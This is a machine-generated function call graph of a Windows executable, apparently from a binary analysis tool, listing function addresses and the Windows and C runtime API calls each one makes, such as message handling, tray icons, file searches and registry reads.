98726->98727 98730 513a53 98726->98730 98728 54d3c1 98727->98728 99061 566d17 59 API calls 98727->99061 98731 513a7d 98730->98731 98732 513a9a Mailbox 98730->98732 99052 513b31 98730->99052 98734 513b31 59 API calls 98731->98734 98735 513a83 98731->98735 98732->98313 98734->98735 98735->98732 99060 515190 59 API calls Mailbox 98735->99060 98737->98313 98738->98277 98739->98315 98740->98315 98741->98283 98742->98315 98743->98315 98744->98313 98745->98313 98746->98313 98747->98313 98748->98313 98750 5139c9 98749->98750 98752 5139f0 98750->98752 99063 513ea3 68 API calls Mailbox 98750->99063 98752->98308 98753->98315 98754->98313 98755->98315 98756->98645 98758 5152c6 98757->98758 98760 515313 98757->98760 98759 5152d3 PeekMessageW 98758->98759 98758->98760 98759->98760 98761 5152ec 98759->98761 98760->98761 98763 54df68 TranslateAcceleratorW 98760->98763 98764 515352 TranslateMessage DispatchMessageW 98760->98764 98765 51533e PeekMessageW 98760->98765 98831 51359e 98760->98831 98761->98720 98763->98760 98763->98765 98764->98765 98765->98760 98765->98761 98767 519a31 98766->98767 98768 519a1d 98766->98768 98870 57a48d 89 API calls 4 library calls 98767->98870 98836 5194e0 98768->98836 98770 519a28 98770->98720 98772 552478 98772->98772 98774 519cb5 98773->98774 98775 55247d 98774->98775 98778 519d1f 98774->98778 98787 519d79 98774->98787 98776 5153b0 274 API calls 98775->98776 98777 552492 98776->98777 98802 519f50 Mailbox 98777->98802 98887 57a48d 89 API calls 4 library calls 98777->98887 98781 521207 59 API calls 98778->98781 98778->98787 98779 521207 59 API calls 98779->98787 98783 5524d8 98781->98783 98782 532f70 __cinit 67 API calls 98782->98787 98785 532f70 __cinit 67 API calls 98783->98785 98784 5524fa 98784->98720 98785->98787 98786 5139be 68 API calls 98786->98802 98787->98779 98787->98782 98787->98784 98790 519f3a 98787->98790 98787->98802 98788 5153b0 274 API calls 98788->98802 98790->98802 98888 57a48d 89 API calls 4 library calls 98790->98888 98791 514230 59 API calls 98791->98802 98792 51a775 98892 57a48d 89 API calls 4 library calls 98792->98892 98796 5527f9 98796->98720 98799 521bcc 59 API calls 98799->98802 98801 57a48d 89 API calls 98801->98802 98802->98786 98802->98788 98802->98791 98802->98792 98802->98799 98802->98801 98803 51a058 98802->98803 98889 567aad 59 API calls 98802->98889 98890 58ccac 274 API calls 98802->98890 98891 58bc26 274 API calls Mailbox 98802->98891 98893 515190 59 API calls Mailbox 98802->98893 98894 589ab0 274 API calls Mailbox 98802->98894 98803->98720 98895 58d1c6 98804->98895 98806 58e630 98806->98720 98808 514d37 84 API calls 98807->98808 98809 57c286 98808->98809 98998 574005 98809->98998 98811 57c28e 98812 57c292 GetLastError 98811->98812 98813 57c2a7 98811->98813 98812->98813 98813->98720 98814->98655 98815->98659 98816->98720 98817->98660 98818->98660 98819->98660 98820->98720 98821->98720 98822->98720 98823->98720 98824->98720 98825->98702 98826->98702 98827->98702 98828->98702 98829->98702 98830->98702 98832 5135e2 98831->98832 98834 5135b0 98831->98834 98832->98760 98833 5135d5 IsDialogMessageW 98833->98832 98833->98834 98834->98832 98834->98833 98835 54d273 GetClassLongW 98834->98835 98835->98833 98835->98834 98837 5153b0 274 API calls 98836->98837 98838 51951f 98837->98838 98839 552001 98838->98839 98853 519527 _memmove 98838->98853 98879 515190 59 API calls Mailbox 98839->98879 98841 5522c0 98885 57a48d 89 API calls 4 library calls 98841->98885 98843 5522de 98843->98843 98844 519583 98844->98770 98845 519944 98847 530fe6 Mailbox 59 API calls 98845->98847 98846 51986a 98848 5522b1 98846->98848 98849 51987f 98846->98849 98850 5196e3 _memmove 98847->98850 98884 58a983 59 API calls 98848->98884 98851 530fe6 Mailbox 59 API calls 98849->98851 98855 51970e 98850->98855 98857 530fe6 Mailbox 59 API calls 98850->98857 98869 519741 98850->98869 98863 51977d 98851->98863 98853->98841 98853->98844 98853->98845 98854 530fe6 59 API calls Mailbox 98853->98854 98856 5196cf 98853->98856 98853->98869 98854->98853 98855->98869 98871 51cca0 98855->98871 98856->98845 98858 5196dc 98856->98858 98857->98855 98860 530fe6 Mailbox 59 API calls 98858->98860 98859 5522a0 98883 57a48d 89 API calls 4 library calls 98859->98883 98860->98850 98863->98770 98865 552278 98882 57a48d 89 API calls 4 library calls 98865->98882 98867 552253 98881 57a48d 89 API calls 4 library calls 98867->98881 98869->98846 98869->98859 98869->98863 98869->98865 98869->98867 98880 518180 274 API calls 98869->98880 98870->98772 98872 51cd02 98871->98872 98873 51ccda 98871->98873 98875 5153b0 274 API calls 98872->98875 98876 51cce0 98872->98876 98877 554971 98872->98877 98874 519c80 274 API calls 98873->98874 98873->98876 98874->98876 98875->98877 98876->98869 98877->98876 98886 57a48d 89 API calls 4 library calls 98877->98886 98879->98845 98880->98869 98881->98863 98882->98863 98883->98863 98884->98841 98885->98843 98886->98876 98887->98802 98888->98802 98889->98802 98890->98802 98891->98802 98892->98796 98893->98802 98894->98802 98896 514d37 84 API calls 98895->98896 98897 58d203 98896->98897 98921 58d24a Mailbox 98897->98921 98933 58de8e 98897->98933 98899 58d4a2 98900 58d617 98899->98900 98904 58d4b0 98899->98904 98982 58dfb1 92 API calls Mailbox 98900->98982 98903 58d626 98903->98904 98905 58d632 98903->98905 98946 58d057 98904->98946 98905->98921 98906 514d37 84 API calls 98923 58d29b Mailbox 98906->98923 98911 58d4e9 98961 530e38 98911->98961 98914 58d51c 98917 5147be 59 API calls 98914->98917 98915 58d503 98981 57a48d 89 API calls 4 library calls 98915->98981 98919 58d528 98917->98919 98918 58d50e GetCurrentProcess TerminateProcess 98918->98914 98920 514540 59 API calls 98919->98920 98922 58d53e 98920->98922 98921->98806 98924 514230 59 API calls 98922->98924 98932 58d565 98922->98932 98923->98899 98923->98906 98923->98921 98979 57fc0d 59 API calls 2 library calls 98923->98979 98980 58d6c8 61 API calls 2 library calls 98923->98980 98926 58d554 98924->98926 98925 58d68d 98925->98921 98929 58d6a1 FreeLibrary 98925->98929 98927 58dd32 107 API calls 98926->98927 98927->98932 98928 514230 59 API calls 98928->98932 98929->98921 98931 51523c 59 API calls 98931->98932 98932->98925 98932->98928 98932->98931 98966 58dd32 98932->98966 98934 521aa4 59 API calls 98933->98934 98935 58dea9 CharLowerBuffW 98934->98935 98983 56f903 98935->98983 98939 521207 59 API calls 98940 58dee2 98939->98940 98941 521462 59 API calls 98940->98941 98943 58def9 98941->98943 98942 58df41 Mailbox 98942->98923 98944 521981 59 API calls 98943->98944 98945 58df05 Mailbox 98944->98945 98945->98942 98990 58d6c8 61 API calls 2 library calls 98945->98990 98947 58d072 98946->98947 98951 58d0c7 98946->98951 98948 530fe6 Mailbox 59 API calls 98947->98948 98949 58d094 98948->98949 98950 530fe6 Mailbox 59 API calls 98949->98950 98949->98951 98950->98949 98952 58e139 98951->98952 98953 58e362 Mailbox 98952->98953 98960 58e15c _strcat _wcscpy __wsetenvp 98952->98960 98953->98911 98954 515087 59 API calls 98954->98960 98955 5150d5 59 API calls 98955->98960 98956 51502b 59 API calls 98956->98960 98957 514d37 84 API calls 98957->98960 98958 53593c 58 API calls std::exception::_Copy_str 98958->98960 98960->98953 98960->98954 98960->98955 98960->98956 98960->98957 98960->98958 98993 575e42 61 API calls 2 library calls 98960->98993 98963 530e4d 98961->98963 98962 530ee5 Sleep 98965 530eb3 98962->98965 98963->98962 98964 530ed3 CloseHandle 98963->98964 98963->98965 98964->98965 98965->98914 98965->98915 98967 58dd4a 98966->98967 98978 58dd66 98966->98978 98968 58de1b 98967->98968 98969 58dd51 98967->98969 98970 58dd72 98967->98970 98967->98978 98997 577b1d 105 API calls Mailbox 98968->98997 98994 575a57 61 API calls 2 library calls 98969->98994 98996 514f98 59 API calls Mailbox 98970->98996 98971 58de41 98971->98932 98974 532f85 _free 58 API calls 98974->98971 98976 58dd5b 98995 514f98 59 API calls Mailbox 98976->98995 98978->98971 98978->98974 98979->98923 98980->98923 98981->98918 98982->98903 98984 56f92e __wsetenvp 98983->98984 98987 56f963 98984->98987 98988 56fa14 98984->98988 98989 56f96d 98984->98989 98987->98989 98991 5214db 61 API calls 98987->98991 98988->98989 98992 5214db 61 API calls 98988->98992 98989->98939 98989->98945 98990->98942 98991->98987 98992->98988 98993->98960 98994->98976 98995->98978 98996->98978 98997->98978 98999 521207 59 API calls 98998->98999 99000 574024 98999->99000 99001 521207 59 API calls 99000->99001 99002 57402d 99001->99002 99003 521207 59 API calls 99002->99003 99004 574036 99003->99004 99022 530284 99004->99022 99009 57405c 99011 530119 59 API calls 99009->99011 99010 521900 59 API calls 99010->99009 99012 574070 FindFirstFileW 99011->99012 99013 5740fc FindClose 99012->99013 99015 57408f 99012->99015 99018 574107 Mailbox 99013->99018 99014 5740d7 FindNextFileW 99014->99015 99015->99013 99015->99014 99016 521c9c 59 API calls 99015->99016 99017 5217e0 59 API calls 99015->99017 99034 521900 99015->99034 99016->99015 99017->99015 99018->98811 99021 5740f3 FindClose 99021->99018 99041 541b70 99022->99041 99025 5302b0 99027 521821 59 API calls 99025->99027 99026 5302cd 99028 5219e1 59 API calls 99026->99028 99029 5302bc 99027->99029 99028->99029 99043 52133d 99029->99043 99032 574fec GetFileAttributesW 99033 57404a 99032->99033 99033->99009 99033->99010 99035 55f534 99034->99035 99036 521914 99034->99036 99038 521c7e 59 API calls 99035->99038 99047 5218a5 99036->99047 99040 55f53f __wsetenvp _memmove 99038->99040 99039 52191f DeleteFileW 99039->99014 99039->99021 99042 530291 GetFullPathNameW 99041->99042 99042->99025 99042->99026 99044 52134b 99043->99044 99045 521981 59 API calls 99044->99045 99046 52135b 99045->99046 99046->99032 99048 5218b4 __wsetenvp 99047->99048 99049 5218c5 _memmove 99048->99049 99050 521c7e 59 API calls 99048->99050 99049->99039 99051 55f4f1 _memmove 99050->99051 99053 513b3f 99052->99053 99059 513b67 99052->99059 99054 513b4d 99053->99054 99055 513b31 59 API calls 99053->99055 99056 513b53 99054->99056 99057 513b31 59 API calls 99054->99057 99055->99054 99056->99059 99062 515190 59 API calls Mailbox 99056->99062 99057->99056 99059->98731 99060->98732 99061->98728 99062->99059 99063->98752 99064->98323 99065->98320 99066->98075 99067->98074 99068->98070 99069->98074 99070->98069 99071->98090 99072->98099 99073->98103 99074->98099 99075->98099 99077 530fe6 Mailbox 59 API calls 99076->99077 99078 5240e0 99077->99078 99079 521c7e 59 API calls 99078->99079 99080 5240ed 99079->99080 99080->98117 99082 524085 99081->99082 99083 52404e 99081->99083 99092 523f20 59 API calls Mailbox 99082->99092 99085 530fe6 Mailbox 59 API calls 99083->99085 99087 524055 WideCharToMultiByte 99085->99087 99086 524077 99086->98121 99091 523f79 59 API calls 2 library calls 99087->99091 99089->98113 99090->98118 99091->99086 99092->99086 99094 577d85 99093->99094 99112 577ea5 99093->99112 99095 577dc5 99094->99095 99096 577d9d 99094->99096 99101 577ddc 99094->99101 99097 530fe6 Mailbox 59 API calls 99095->99097 99096->99095 99099 577dad 99096->99099 99098 577dbb Mailbox _memmove 99097->99098 99109 530fe6 Mailbox 59 API calls 99098->99109 99107 530fe6 Mailbox 59 API calls 99099->99107 99100 577df9 99100->99098 99102 577e24 99100->99102 99103 577e32 99100->99103 99101->99100 99104 530fe6 Mailbox 59 API calls 99101->99104 99105 530fe6 Mailbox 59 API calls 99102->99105 99106 530fe6 Mailbox 59 API calls 99103->99106 99104->99100 99105->99098 99108 577e38 99106->99108 99107->99098 99114 577a26 59 API calls Mailbox 99108->99114 99109->99112 99111 577e44 99113 52402a 61 API calls 99111->99113 99112->98136 99113->99098 99114->99111 99116 577cf1 99115->99116 99117 530fe6 Mailbox 59 API calls 99116->99117 99118 577cf8 99117->99118 99121 576135 99118->99121 99120 577d3b Mailbox 99120->98142 99122 521aa4 59 API calls 99121->99122 99123 576148 CharLowerBuffW 99122->99123 99128 57615b 99123->99128 99124 521609 59 API calls 99124->99128 99125 576195 99126 5761a7 99125->99126 99129 521609 59 API calls 99125->99129 99127 530fe6 Mailbox 59 API calls 99126->99127 99132 5761d5 99127->99132 99128->99124 99128->99125 99138 576165 _memset Mailbox 99128->99138 99129->99126 99134 5761f4 99132->99134 99154 576071 59 API calls 99132->99154 99133 576233 99135 530fe6 Mailbox 59 API calls 99133->99135 99133->99138 99139 576292 99134->99139 99136 57624d 99135->99136 99137 530fe6 Mailbox 59 API calls 99136->99137 99137->99138 99138->99120 99140 521207 59 API calls 99139->99140 99141 5762c4 99140->99141 99142 521207 59 API calls 99141->99142 99143 5762cd 99142->99143 99144 521207 59 API calls 99143->99144 99147 5762d6 _wcscmp 99144->99147 99145 5765ab Mailbox 99145->99133 99146 533836 GetStringTypeW 99146->99147 99147->99145 99147->99146 99148 521821 59 API calls 99147->99148 99149 52153b 59 API calls 99147->99149 99151 576292 60 API calls 99147->99151 99152 5337ba 59 API calls 99147->99152 99153 521c9c 59 API calls 99147->99153 99155 53385c GetStringTypeW _iswctype 99147->99155 99148->99147 99149->99147 99151->99147 99152->99147 99153->99147 99154->99132 99155->99147 99157 530fe6 Mailbox 59 API calls 99156->99157 99158 515285 99157->99158 99159 515294 99158->99159 99160 521a36 59 API calls 99158->99160 99159->98147 99160->99159 99162 533139 99161->99162 99163 5331ae 99161->99163 99170 53315e 99162->99170 99189 538d58 58 API calls __getptd_noexit 99162->99189 99191 5331c0 60 API calls 3 library calls 99163->99191 99166 5331bb 99166->98155 99167 533145 99190 538fe6 9 API calls __woutput_l 99167->99190 99169 533150 99169->98155 99170->98155 99172 5259fe _memset 99171->99172 99192 525800 99172->99192 99175 525a83 99177 525ab9 Shell_NotifyIconW 99175->99177 99178 525a9d Shell_NotifyIconW 99175->99178 99179 525aab 99177->99179 99178->99179 99196 5256f8 99179->99196 99181 525ab2 99181->98155 99183 525b25 99182->99183 99184 525ad5 _memset 99182->99184 99183->98155 99185 525af4 Shell_NotifyIconW 99184->99185 99185->99183 99186->98155 99187->98155 99188->98155 99189->99167 99190->99169 99191->99166 99193 525810 99192->99193 99194 52581c 99192->99194 99193->99175 99226 5734dd 62 API calls _W_store_winword 99193->99226 99194->99193 99195 525821 DestroyIcon 99194->99195 99195->99193 99197 525715 99196->99197 99217 5257fa Mailbox 99196->99217 99198 52162d 59 API calls 99197->99198 99199 525723 99198->99199 99200 525730 99199->99200 99201 560c4c LoadStringW 99199->99201 99202 521821 59 API calls 99200->99202 99204 560c66 99201->99204 99203 525745 99202->99203 99205 525752 99203->99205 99211 560c74 99203->99211 99206 521c9c 59 API calls 99204->99206 99205->99204 99207 525760 99205->99207 99213 525778 _memset _wcscpy 99206->99213 99208 521900 59 API calls 99207->99208 99209 52576a 99208->99209 99210 5217e0 59 API calls 99209->99210 99210->99213 99212 560cb7 Mailbox 99211->99212 99211->99213 99214 521207 59 API calls 99211->99214 99228 5338c8 83 API calls 2 library calls 99212->99228 99215 5257e0 Shell_NotifyIconW 99213->99215 99216 560c9e 99214->99216 99215->99217 99227 570252 60 API calls Mailbox 99216->99227 99217->99181 99220 560ca9 99222 5217e0 59 API calls 99220->99222 99221 560cd6 99223 521900 59 API calls 99221->99223 99222->99212 99224 560ce7 99223->99224 99225 521900 59 API calls 99224->99225 99225->99213 99226->99175 99227->99220 99228->99221 99229->98176 99230->98180 99231->98185 99232->98196 99233->98200 99234 517357 99235 5178f5 99234->99235 99236 517360 99234->99236 99238 516fdb Mailbox 99235->99238 99245 5687f9 59 API calls _memmove 99235->99245 99236->99235 99237 514d37 84 API calls 99236->99237 99239 51738b 99237->99239 99239->99235 99240 51739b 99239->99240 99242 521680 59 API calls 99240->99242 99242->99238 99243 54f91b 99244 521c9c 59 API calls 99243->99244 99244->99238 99245->99243 99246 511016 99251 525ce7 99246->99251 99249 532f70 __cinit 67 API calls 99250 511025 99249->99250 99252 530fe6 Mailbox 59 API calls 99251->99252 99253 525cef 99252->99253 99254 51101b 99253->99254 99258 525f39 99253->99258 99254->99249 99259 525f42 99258->99259 99261 525cfb 99258->99261 99260 532f70 __cinit 67 API calls 99259->99260 99260->99261 99262 525d13 99261->99262 99263 521207 59 API calls 99262->99263 99264 525d2b GetVersionExW 99263->99264 99265 521821 59 API calls 99264->99265 99266 525d6e 99265->99266 99267 521981 59 API calls 99266->99267 99272 525d9b 99266->99272 99268 525d8f 99267->99268 99269 52133d 59 API calls 99268->99269 99269->99272 99270 525e00 GetCurrentProcess IsWow64Process 99271 525e19 99270->99271 99274 525e98 GetSystemInfo 99271->99274 99275 525e2f 99271->99275 99272->99270 99273 561098 99272->99273 99276 525e65 99274->99276 99286 5255f0 99275->99286 99276->99254 99279 525e41 99281 5255f0 2 API calls 99279->99281 99280 525e8c GetSystemInfo 99282 525e56 99280->99282 99283 525e49 GetNativeSystemInfo 99281->99283 99282->99276 99284 525e5c FreeLibrary 99282->99284 99283->99282 99284->99276 99287 525619 99286->99287 99288 5255f9 LoadLibraryA 99286->99288 99287->99279 99287->99280 99288->99287 99289 52560a GetProcAddress 99288->99289 99289->99287 99290 51107d 99295 522fc5 99290->99295 99292 51108c 99293 532f70 __cinit 67 API calls 99292->99293 99294 511096 99293->99294 99296 522fd5 __write_nolock 99295->99296 99297 521207 59 API calls 99296->99297 99298 52308b 99297->99298 99326 5300cf 99298->99326 99300 523094 99333 5308c1 99300->99333 99303 521900 59 API calls 99304 5230ad 99303->99304 99339 524c94 99304->99339 99307 521207 59 API calls 99308 5230c5 99307->99308 99309 5219e1 59 API calls 99308->99309 99310 5230ce RegOpenKeyExW 99309->99310 99311 5601a3 RegQueryValueExW 99310->99311 99315 5230f0 Mailbox 99310->99315 99312 560235 RegCloseKey 99311->99312 99313 5601c0 99311->99313 99312->99315 99325 560247 _wcscat Mailbox __wsetenvp 99312->99325 99314 530fe6 Mailbox 59 API calls 99313->99314 99316 5601d9 99314->99316 99315->99292 99317 52433f 59 API calls 99316->99317 99318 5601e4 RegQueryValueExW 99317->99318 99320 560201 99318->99320 99322 56021b 99318->99322 99319 521609 59 API calls 99319->99325 99321 521821 59 API calls 99320->99321 99321->99322 99322->99312 99323 521a36 59 API calls 99323->99325 99324 524c94 59 API calls 99324->99325 99325->99315 99325->99319 99325->99323 99325->99324 99327 541b70 __write_nolock 99326->99327 99328 5300dc GetModuleFileNameW 99327->99328 99329 521a36 59 API calls 99328->99329 99330 530102 99329->99330 99331 530284 60 API calls 99330->99331 99332 53010c Mailbox 99331->99332 99332->99300 99334 541b70 __write_nolock 99333->99334 99335 5308ce GetFullPathNameW 99334->99335 99336 5308f0 99335->99336 99337 521821 59 API calls 99336->99337 99338 52309f 99337->99338 99338->99303 99340 524ca2 99339->99340 99344 524cc4 _memmove 99339->99344 99342 530fe6 Mailbox 59 API calls 99340->99342 99341 530fe6 Mailbox 59 API calls 99343 5230bc 99341->99343 99342->99344 99343->99307 99344->99341 99345 5548fb 99346 51b020 274 API calls 99345->99346 99347 554912 99346->99347 99349 51cce0 99347->99349 99350 57a48d 89 API calls 4 library calls 99347->99350 99349->99349 99350->99349 99351 537e83 99352 537e8f __alloc_osfhnd 99351->99352 99388 53a038 GetStartupInfoW 99352->99388 99354 537e94 99390 538dac GetProcessHeap 99354->99390 99356 537eec 99357 537ef7 99356->99357 99473 537fd3 58 API calls 3 library calls 99356->99473 99391 539d16 99357->99391 99360 537efd 99361 537f08 __RTC_Initialize 99360->99361 99474 537fd3 58 API calls 3 library calls 99360->99474 99412 53d802 99361->99412 99364 537f17 99365 537f23 GetCommandLineW 99364->99365 99475 537fd3 58 API calls 3 library calls 99364->99475 99431 545153 GetEnvironmentStringsW 99365->99431 99368 537f22 99368->99365 99371 537f3d 99372 537f48 99371->99372 99476 5332e5 58 API calls 3 library calls 99371->99476 99441 544f88 99372->99441 99375 537f4e 99378 537f59 99375->99378 99477 5332e5 58 API calls 3 library calls 99375->99477 99455 53331f 99378->99455 99379 537f61 99380 537f6c __wwincmdln 99379->99380 99478 5332e5 58 API calls 3 library calls 99379->99478 99461 525f8b 99380->99461 99383 537f80 99384 537f8f 99383->99384 99479 533588 58 API calls _doexit 99383->99479 99480 533310 58 API calls _doexit 99384->99480 99387 537f94 __alloc_osfhnd 99389 53a04e 99388->99389 99389->99354 99390->99356 99481 5333b7 36 API calls 2 library calls 99391->99481 99393 539d1b 99482 539f6c InitializeCriticalSectionAndSpinCount __alloc_osfhnd 99393->99482 99395 539d20 99396 539d24 99395->99396 99484 539fba TlsAlloc 99395->99484 99483 539d8c 61 API calls 2 library calls 99396->99483 99399 539d29 99399->99360 99400 539d36 99400->99396 99401 539d41 99400->99401 99485 538a05 99401->99485 99404 539d83 99493 539d8c 61 API calls 2 library calls 99404->99493 99407 539d88 99407->99360 99408 539d62 99408->99404 99409 539d68 99408->99409 99492 539c63 58 API calls 4 library calls 99409->99492 99411 539d70 GetCurrentThreadId 99411->99360 99413 53d80e __alloc_osfhnd 99412->99413 99414 539e3b __lock 58 API calls 99413->99414 99415 53d815 99414->99415 99416 538a05 __calloc_crt 58 API calls 99415->99416 99418 53d826 99416->99418 99417 53d891 GetStartupInfoW 99425 53d8a6 99417->99425 99426 53d9d5 99417->99426 99418->99417 99419 53d831 __alloc_osfhnd @_EH4_CallFilterFunc@8 99418->99419 99419->99364 99420 53da9d 99507 53daad LeaveCriticalSection _doexit 99420->99507 99422 538a05 __calloc_crt 58 API calls 99422->99425 99423 53da22 GetStdHandle 99423->99426 99424 53da35 GetFileType 99424->99426 99425->99422 99425->99426 99427 53d8f4 99425->99427 99426->99420 99426->99423 99426->99424 99506 53a05b InitializeCriticalSectionAndSpinCount 99426->99506 99427->99426 99428 53d928 GetFileType 99427->99428 99505 53a05b InitializeCriticalSectionAndSpinCount 99427->99505 99428->99427 99432 545164 99431->99432 99433 537f33 99431->99433 99508 538a4d 58 API calls 2 library calls 99432->99508 99437 544d4b GetModuleFileNameW 99433->99437 99435 5451a0 FreeEnvironmentStringsW 99435->99433 99436 54518a _memmove 99436->99435 99438 544d7f _wparse_cmdline 99437->99438 99440 544dbf _wparse_cmdline 99438->99440 99509 538a4d 58 API calls 2 library calls 99438->99509 99440->99371 99442 544fa1 __wsetenvp 99441->99442 99446 544f99 99441->99446 99443 538a05 __calloc_crt 58 API calls 99442->99443 99451 544fca __wsetenvp 99443->99451 99444 545021 99445 532f85 _free 58 API calls 99444->99445 99445->99446 99446->99375 99447 538a05 __calloc_crt 58 API calls 99447->99451 99448 545046 99450 532f85 _free 58 API calls 99448->99450 99450->99446 99451->99444 99451->99446 99451->99447 99451->99448 99452 54505d 99451->99452 99510 544837 58 API calls __woutput_l 99451->99510 99511 538ff6 IsProcessorFeaturePresent 99452->99511 99454 545069 99454->99375 99456 53332b __IsNonwritableInCurrentImage 99455->99456 99534 53a701 99456->99534 99458 533349 __initterm_e 99459 532f70 __cinit 67 API calls 99458->99459 99460 533368 __cinit __IsNonwritableInCurrentImage 99458->99460 99459->99460 99460->99379 99462 526044 99461->99462 99463 525fa5 99461->99463 99462->99383 99464 525fdf IsThemeActive 99463->99464 99537 53359c 99464->99537 99468 52600b 99549 525f00 SystemParametersInfoW SystemParametersInfoW 99468->99549 99470 526017 99550 525240 99470->99550 99472 52601f SystemParametersInfoW 99472->99462 99473->99357 99474->99361 99475->99368 99479->99384 99480->99387 99481->99393 99482->99395 99483->99399 99484->99400 99487 538a0c 99485->99487 99488 538a47 99487->99488 99490 538a2a 99487->99490 99494 545426 99487->99494 99488->99404 99491 53a016 TlsSetValue 99488->99491 99490->99487 99490->99488 99502 53a362 Sleep 99490->99502 99491->99408 99492->99411 99493->99407 99495 545431 99494->99495 99497 54544c 99494->99497 99496 54543d 99495->99496 99495->99497 99503 538d58 58 API calls __getptd_noexit 99496->99503 99499 54545c RtlAllocateHeap 99497->99499 99500 545442 99497->99500 99504 5335d1 DecodePointer 99497->99504 99499->99497 99499->99500 99500->99487 99502->99490 99503->99500 99504->99497 99505->99427 99506->99426 99507->99419 99508->99436 99509->99440 99510->99451 99512 539001 99511->99512 99517 538e89 99512->99517 99516 53901c 99516->99454 99518 538ea3 _memset ___raise_securityfailure 99517->99518 99519 538ec3 IsDebuggerPresent 99518->99519 99525 53a385 SetUnhandledExceptionFilter UnhandledExceptionFilter 99519->99525 99521 538f87 ___raise_securityfailure 99526 53c826 99521->99526 99523 538faa 99524 53a370 GetCurrentProcess TerminateProcess 99523->99524 99524->99516 99525->99521 99527 53c830 IsProcessorFeaturePresent 99526->99527 99528 53c82e 99526->99528 99530 545b3a 99527->99530 99528->99523 99533 545ae9 5 API calls 2 library calls 99530->99533 99532 545c1d 99532->99523 99533->99532 99535 53a704 EncodePointer 99534->99535 99535->99535 99536 53a71e 99535->99536 99536->99458 99538 539e3b __lock 58 API calls 99537->99538 99539 5335a7 DecodePointer EncodePointer 99538->99539 99602 539fa5 LeaveCriticalSection 99539->99602 99541 526004 99542 533604 99541->99542 99543 533628 99542->99543 99544 53360e 99542->99544 99543->99468 99544->99543 99603 538d58 58 API calls __getptd_noexit 99544->99603 99546 533618 99604 538fe6 9 API calls __woutput_l 99546->99604 99548 533623 99548->99468 99549->99470 99551 52524d __write_nolock 99550->99551 99552 521207 59 API calls 99551->99552 99553 525258 GetCurrentDirectoryW 99552->99553 99605 524ec8 99553->99605 99555 52527e IsDebuggerPresent 99556 560b21 MessageBoxA 99555->99556 99557 52528c 99555->99557 99559 560b39 99556->99559 99558 5252a0 99557->99558 99557->99559 99673 5231bf 99558->99673 99713 52314d 59 API calls Mailbox 99559->99713 99563 560b49 99569 560b5f SetCurrentDirectoryW 99563->99569 99572 52536c Mailbox 99569->99572 99572->99472 99602->99541 99603->99546 99604->99548 99606 521207 59 API calls 99605->99606 99607 524ede 99606->99607 99715 525420 99607->99715 99609 524efc 99610 5219e1 59 API calls 99609->99610 99611 524f10 99610->99611 99612 521c9c 59 API calls 99611->99612 99613 524f1b 99612->99613 99614 51477a 59 API calls 99613->99614 99615 524f27 99614->99615 99616 521a36 59 API calls 99615->99616 99617 524f34 99616->99617 99618 5139be 68 API calls 99617->99618 99619 524f44 Mailbox 99618->99619 99620 521a36 59 API calls 99619->99620 99621 524f68 99620->99621 99622 5139be 68 API calls 99621->99622 99623 524f77 Mailbox 99622->99623 99624 521207 59 API calls 99623->99624 99625 524f94 99624->99625 99729 5255bc 99625->99729 99628 53312d _W_store_winword 60 API calls 99629 524fae 99628->99629 99630 560a54 99629->99630 99631 524fb8 99629->99631 99632 5255bc 59 API calls 99630->99632 99633 53312d _W_store_winword 60 API calls 99631->99633 99634 560a68 99632->99634 99635 524fc3 99633->99635 99637 5255bc 59 API calls 99634->99637 99635->99634 99636 524fcd 99635->99636 99638 53312d _W_store_winword 60 API calls 99636->99638 99640 560a84 99637->99640 99639 524fd8 99638->99639 99639->99640 99641 524fe2 99639->99641 99642 5300cf 61 API calls 99640->99642 99643 53312d _W_store_winword 60 API calls 99641->99643 99644 560aa7 99642->99644 99645 524fed 99643->99645 99646 5255bc 59 API calls 99644->99646 99647 524ff7 99645->99647 99662 560ad0 99645->99662 99648 560ab3 99646->99648 99651 521c9c 59 API calls 99647->99651 99652 52501b 99647->99652 99650 521c9c 59 API calls 99648->99650 99649 5255bc 59 API calls 99653 560aee 99649->99653 99654 560ac1 99650->99654 99655 52500e 99651->99655 99656 5147be 59 API calls 99652->99656 99657 521c9c 59 API calls 99653->99657 99658 5255bc 59 API calls 99654->99658 99659 5255bc 59 API calls 99655->99659 99660 52502a 99656->99660 99661 560afc 99657->99661 99658->99662 99659->99652 99663 514540 59 API calls 99660->99663 99664 5255bc 59 API calls 99661->99664 99662->99649 99666 525038 99663->99666 99665 560b0b 99664->99665 99665->99665 99667 5143d0 59 API calls 99666->99667 99670 525055 99667->99670 99668 51477a 59 API calls 99668->99670 99669 5143d0 59 API calls 99669->99670 99670->99668 99670->99669 99671 5255bc 59 API calls 99670->99671 99672 52509b Mailbox 99670->99672 99671->99670 99672->99555 99674 5231cc __write_nolock 99673->99674 99675 560314 _memset 99674->99675 99676 5231e5 99674->99676 99678 560330 GetOpenFileNameW 99675->99678 99677 530284 60 API calls 99676->99677 99679 5231ee 99677->99679 99680 56037f 99678->99680 99735 5309c5 99679->99735 99682 521821 59 API calls 99680->99682 99684 560394 99682->99684 99684->99684 99686 523203 99753 52278a 99686->99753 99713->99563 99716 52542d __write_nolock 99715->99716 99717 521821 59 API calls 99716->99717 99723 525590 Mailbox 99716->99723 99719 52545f 99717->99719 99718 521609 59 API calls 99718->99719 99719->99718 99728 525495 Mailbox 99719->99728 99720 521609 59 API calls 99720->99728 99721 525563 99722 521a36 59 API calls 99721->99722 99721->99723 99724 525584 99722->99724 99723->99609 99726 524c94 59 API calls 99724->99726 99725 521a36 59 API calls 99725->99728 99726->99723 99727 524c94 59 API calls 99727->99728 99728->99720 99728->99721 99728->99723 99728->99725 99728->99727 99730 5255c6 99729->99730 99731 5255df 99729->99731 99732 521c9c 59 API calls 99730->99732 99733 521821 59 API calls 99731->99733 99734 524fa0 99732->99734 99733->99734 99734->99628 99736 541b70 __write_nolock 99735->99736 99737 5309d2 GetLongPathNameW 99736->99737 99738 521821 59 API calls 99737->99738 99739 5231f7 99738->99739 99740 522f3d 99739->99740 99741 521207 59 API calls 99740->99741 99742 522f4f 99741->99742 99743 530284 60 API calls 99742->99743 99744 522f5a 99743->99744 99745 560177 99744->99745 99746 522f65 99744->99746 99750 560191 99745->99750 99793 52151f 61 API calls 99745->99793 99748 524c94 59 API calls 99746->99748 99749 522f71 99748->99749 99787 511307 99749->99787 99752 522f84 Mailbox 99752->99686 99794 5249c2 99753->99794 99756 55f8d6 99911 579b16 99756->99911 99757 5249c2 136 API calls 99759 5227c3 99757->99759 99759->99756 99761 5227cb 99759->99761 99765 5227d7 99761->99765 99766 55f8f3 99761->99766 99818 5229be 99765->99818 99975 5747e8 90 API calls _wprintf 